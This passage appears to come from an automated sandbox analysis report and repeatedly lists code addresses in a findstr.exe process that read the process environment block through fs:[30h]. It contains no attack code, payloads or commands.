              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C0 mov eax, dword ptr fs:[00000030h]16_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F250D9 mov eax, dword ptr fs:[00000030h]16_2_02F250D9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED20DE mov eax, dword ptr fs:[00000030h]16_2_02ED20DE
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E790DB mov eax, dword ptr fs:[00000030h]16_2_02E790DB
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F160B8 mov eax, dword ptr fs:[00000030h]16_2_02F160B8
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F160B8 mov ecx, dword ptr fs:[00000030h]16_2_02F160B8
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4D08D mov eax, dword ptr fs:[00000030h]16_2_02E4D08D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5208A mov eax, dword ptr fs:[00000030h]16_2_02E5208A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E55096 mov eax, dword ptr fs:[00000030h]16_2_02E55096
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8909C mov eax, dword ptr fs:[00000030h]16_2_02E8909C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7D090 mov eax, dword ptr fs:[00000030h]16_2_02E7D090
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7D090 mov eax, dword ptr fs:[00000030h]16_2_02E7D090
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F25060 mov eax, dword ptr fs:[00000030h]16_2_02F25060
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7C073 mov eax, dword ptr fs:[00000030h]16_2_02E7C073
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov ecx, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61070 mov eax, dword ptr fs:[00000030h]16_2_02E61070
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EF705E mov ebx, dword ptr fs:[00000030h]16_2_02EF705E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EF705E mov eax, dword ptr fs:[00000030h]16_2_02EF705E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E52050 mov eax, dword ptr fs:[00000030h]16_2_02E52050
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7B052 mov eax, dword ptr fs:[00000030h]16_2_02E7B052
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4A020 mov eax, dword ptr fs:[00000030h]16_2_02E4A020
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4C020 mov eax, dword ptr fs:[00000030h]16_2_02E4C020
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1903E mov eax, dword ptr fs:[00000030h]16_2_02F1903E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1903E mov eax, dword ptr fs:[00000030h]16_2_02F1903E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1903E mov eax, dword ptr fs:[00000030h]16_2_02F1903E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1903E mov eax, dword ptr fs:[00000030h]16_2_02F1903E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6E016 mov eax, dword ptr fs:[00000030h]16_2_02E6E016
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6E016 mov eax, dword ptr fs:[00000030h]16_2_02E6E016
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6E016 mov eax, dword ptr fs:[00000030h]16_2_02E6E016
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6E016 mov eax, dword ptr fs:[00000030h]16_2_02E6E016
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E751EF mov eax, dword ptr fs:[00000030h]16_2_02E751EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E551ED mov eax, dword ptr fs:[00000030h]16_2_02E551ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E801F8 mov eax, dword ptr fs:[00000030h]16_2_02E801F8
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F261E5 mov eax, dword ptr fs:[00000030h]16_2_02F261E5
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F161C3 mov eax, dword ptr fs:[00000030h]16_2_02F161C3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F161C3 mov eax, dword ptr fs:[00000030h]16_2_02F161C3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8D1D0 mov eax, dword ptr fs:[00000030h]16_2_02E8D1D0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8D1D0 mov ecx, dword ptr fs:[00000030h]16_2_02E8D1D0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F251CB mov eax, dword ptr fs:[00000030h]16_2_02F251CB
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F011A4 mov eax, dword ptr fs:[00000030h]16_2_02F011A4
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F011A4 mov eax, dword ptr fs:[00000030h]16_2_02F011A4
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F011A4 mov eax, dword ptr fs:[00000030h]16_2_02F011A4
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F011A4 mov eax, dword ptr fs:[00000030h]16_2_02F011A4
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6B1B0 mov eax, dword ptr fs:[00000030h]16_2_02E6B1B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E90185 mov eax, dword ptr fs:[00000030h]16_2_02E90185
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED019F mov eax, dword ptr fs:[00000030h]16_2_02ED019F
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED019F mov eax, dword ptr fs:[00000030h]16_2_02ED019F
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED019F mov eax, dword ptr fs:[00000030h]16_2_02ED019F
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED019F mov eax, dword ptr fs:[00000030h]16_2_02ED019F
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4A197 mov eax, dword ptr fs:[00000030h]16_2_02E4A197
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4A197 mov eax, dword ptr fs:[00000030h]16_2_02E4A197
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4A197 mov eax, dword ptr fs:[00000030h]16_2_02E4A197
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0C188 mov eax, dword ptr fs:[00000030h]16_2_02F0C188
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0C188 mov eax, dword ptr fs:[00000030h]16_2_02F0C188
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F172 mov eax, dword ptr fs:[00000030h]16_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE9179 mov eax, dword ptr fs:[00000030h]16_2_02EE9179
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F25152 mov eax, dword ptr fs:[00000030h]16_2_02F25152
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE4144 mov eax, dword ptr fs:[00000030h]16_2_02EE4144
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE4144 mov eax, dword ptr fs:[00000030h]16_2_02EE4144
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE4144 mov ecx, dword ptr fs:[00000030h]16_2_02EE4144
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE4144 mov eax, dword ptr fs:[00000030h]16_2_02EE4144
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE4144 mov eax, dword ptr fs:[00000030h]16_2_02EE4144
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E49148 mov eax, dword ptr fs:[00000030h]16_2_02E49148
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E49148 mov eax, dword ptr fs:[00000030h]16_2_02E49148
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E49148 mov eax, dword ptr fs:[00000030h]16_2_02E49148
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E49148 mov eax, dword ptr fs:[00000030h]16_2_02E49148
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E56154 mov eax, dword ptr fs:[00000030h]16_2_02E56154
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E56154 mov eax, dword ptr fs:[00000030h]16_2_02E56154
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4C156 mov eax, dword ptr fs:[00000030h]16_2_02E4C156
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E57152 mov eax, dword ptr fs:[00000030h]16_2_02E57152
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E80124 mov eax, dword ptr fs:[00000030h]16_2_02E80124
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B136 mov eax, dword ptr fs:[00000030h]16_2_02E4B136
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B136 mov eax, dword ptr fs:[00000030h]16_2_02E4B136
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B136 mov eax, dword ptr fs:[00000030h]16_2_02E4B136
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B136 mov eax, dword ptr fs:[00000030h]16_2_02E4B136
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E51131 mov eax, dword ptr fs:[00000030h]16_2_02E51131
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E51131 mov eax, dword ptr fs:[00000030h]16_2_02E51131
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F10115 mov eax, dword ptr fs:[00000030h]16_2_02F10115
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EFA118 mov ecx, dword ptr fs:[00000030h]16_2_02EFA118
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EFA118 mov eax, dword ptr fs:[00000030h]16_2_02EFA118
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EFA118 mov eax, dword ptr fs:[00000030h]16_2_02EFA118
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EFA118 mov eax, dword ptr fs:[00000030h]16_2_02EFA118
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0D6F0 mov eax, dword ptr fs:[00000030h]16_2_02F0D6F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE36EE mov eax, dword ptr fs:[00000030h]16_2_02EE36EE
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE36EE mov eax, dword ptr fs:[00000030h]16_2_02EE36EE
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE36EE mov eax, dword ptr fs:[00000030h]16_2_02EE36EE
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE36EE mov eax, dword ptr fs:[00000030h]16_2_02EE36EE
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE36EE mov eax, dword ptr fs:[00000030h]16_2_02EE36EE
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EE36EE mov eax, dword ptr fs:[00000030h]16_2_02EE36EE
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7D6E0 mov eax, dword ptr fs:[00000030h]16_2_02E7D6E0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7D6E0 mov eax, dword ptr fs:[00000030h]16_2_02E7D6E0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E836EF mov eax, dword ptr fs:[00000030h]16_2_02E836EF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED06F1 mov eax, dword ptr fs:[00000030h]16_2_02ED06F1
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED06F1 mov eax, dword ptr fs:[00000030h]16_2_02ED06F1
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ECE6F2 mov eax, dword ptr fs:[00000030h]16_2_02ECE6F2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ECE6F2 mov eax, dword ptr fs:[00000030h]16_2_02ECE6F2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ECE6F2 mov eax, dword ptr fs:[00000030h]16_2_02ECE6F2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ECE6F2 mov eax, dword ptr fs:[00000030h]16_2_02ECE6F2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5B6C0 mov eax, dword ptr fs:[00000030h]16_2_02E5B6C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5B6C0 mov eax, dword ptr fs:[00000030h]16_2_02E5B6C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5B6C0 mov eax, dword ptr fs:[00000030h]16_2_02E5B6C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5B6C0 mov eax, dword ptr fs:[00000030h]16_2_02E5B6C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5B6C0 mov eax, dword ptr fs:[00000030h]16_2_02E5B6C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5B6C0 mov eax, dword ptr fs:[00000030h]16_2_02E5B6C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E816CF mov eax, dword ptr fs:[00000030h]16_2_02E816CF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8A6C7 mov ebx, dword ptr fs:[00000030h]16_2_02E8A6C7
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8A6C7 mov eax, dword ptr fs:[00000030h]16_2_02E8A6C7
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0F6C7 mov eax, dword ptr fs:[00000030h]16_2_02F0F6C7
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F116CC mov eax, dword ptr fs:[00000030h]16_2_02F116CC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F116CC mov eax, dword ptr fs:[00000030h]16_2_02F116CC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F116CC mov eax, dword ptr fs:[00000030h]16_2_02F116CC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F116CC mov eax, dword ptr fs:[00000030h]16_2_02F116CC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4D6AA mov eax, dword ptr fs:[00000030h]16_2_02E4D6AA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4D6AA mov eax, dword ptr fs:[00000030h]16_2_02E4D6AA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8C6A6 mov eax, dword ptr fs:[00000030h]16_2_02E8C6A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E476B2 mov eax, dword ptr fs:[00000030h]16_2_02E476B2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E476B2 mov eax, dword ptr fs:[00000030h]16_2_02E476B2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E476B2 mov eax, dword ptr fs:[00000030h]16_2_02E476B2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E866B0 mov eax, dword ptr fs:[00000030h]16_2_02E866B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED368C mov eax, dword ptr fs:[00000030h]16_2_02ED368C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED368C mov eax, dword ptr fs:[00000030h]16_2_02ED368C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED368C mov eax, dword ptr fs:[00000030h]16_2_02ED368C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED368C mov eax, dword ptr fs:[00000030h]16_2_02ED368C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E54690 mov eax, dword ptr fs:[00000030h]16_2_02E54690
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E54690 mov eax, dword ptr fs:[00000030h]16_2_02E54690
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8A660 mov eax, dword ptr fs:[00000030h]16_2_02E8A660
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8A660 mov eax, dword ptr fs:[00000030h]16_2_02E8A660
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E89660 mov eax, dword ptr fs:[00000030h]16_2_02E89660
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E89660 mov eax, dword ptr fs:[00000030h]16_2_02E89660
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E82674 mov eax, dword ptr fs:[00000030h]16_2_02E82674
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1866E mov eax, dword ptr fs:[00000030h]16_2_02F1866E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1866E mov eax, dword ptr fs:[00000030h]16_2_02F1866E
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6C640 mov eax, dword ptr fs:[00000030h]16_2_02E6C640
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6E627 mov eax, dword ptr fs:[00000030h]16_2_02E6E627
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F626 mov eax, dword ptr fs:[00000030h]16_2_02E4F626
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F626 mov eax, dword ptr fs:[00000030h]16_2_02E4F626
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F626 mov eax, dword ptr fs:[00000030h]16_2_02E4F626
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F626 mov eax, dword ptr fs:[00000030h]16_2_02E4F626
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F626 mov eax, dword ptr fs:[00000030h]16_2_02E4F626
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F626 mov eax, dword ptr fs:[00000030h]16_2_02E4F626
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F626 mov eax, dword ptr fs:[00000030h]16_2_02E4F626
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F626 mov eax, dword ptr fs:[00000030h]16_2_02E4F626
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F626 mov eax, dword ptr fs:[00000030h]16_2_02E4F626
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F25636 mov eax, dword ptr fs:[00000030h]16_2_02F25636
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E86620 mov eax, dword ptr fs:[00000030h]16_2_02E86620
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E88620 mov eax, dword ptr fs:[00000030h]16_2_02E88620
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5262C mov eax, dword ptr fs:[00000030h]16_2_02E5262C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ECE609 mov eax, dword ptr fs:[00000030h]16_2_02ECE609
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8F603 mov eax, dword ptr fs:[00000030h]16_2_02E8F603
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6260B mov eax, dword ptr fs:[00000030h]16_2_02E6260B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6260B mov eax, dword ptr fs:[00000030h]16_2_02E6260B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6260B mov eax, dword ptr fs:[00000030h]16_2_02E6260B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6260B mov eax, dword ptr fs:[00000030h]16_2_02E6260B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6260B mov eax, dword ptr fs:[00000030h]16_2_02E6260B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6260B mov eax, dword ptr fs:[00000030h]16_2_02E6260B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6260B mov eax, dword ptr fs:[00000030h]16_2_02E6260B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E81607 mov eax, dword ptr fs:[00000030h]16_2_02E81607
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92619 mov eax, dword ptr fs:[00000030h]16_2_02E92619
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E53616 mov eax, dword ptr fs:[00000030h]16_2_02E53616
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E53616 mov eax, dword ptr fs:[00000030h]16_2_02E53616
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5D7E0 mov ecx, dword ptr fs:[00000030h]16_2_02E5D7E0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E727ED mov eax, dword ptr fs:[00000030h]16_2_02E727ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E727ED mov eax, dword ptr fs:[00000030h]16_2_02E727ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E727ED mov eax, dword ptr fs:[00000030h]16_2_02E727ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E547FB mov eax, dword ptr fs:[00000030h]16_2_02E547FB
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E547FB mov eax, dword ptr fs:[00000030h]16_2_02E547FB
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5C7C0 mov eax, dword ptr fs:[00000030h]16_2_02E5C7C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E557C0 mov eax, dword ptr fs:[00000030h]16_2_02E557C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E557C0 mov eax, dword ptr fs:[00000030h]16_2_02E557C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E557C0 mov eax, dword ptr fs:[00000030h]16_2_02E557C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EDF7AF mov eax, dword ptr fs:[00000030h]16_2_02EDF7AF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EDF7AF mov eax, dword ptr fs:[00000030h]16_2_02EDF7AF
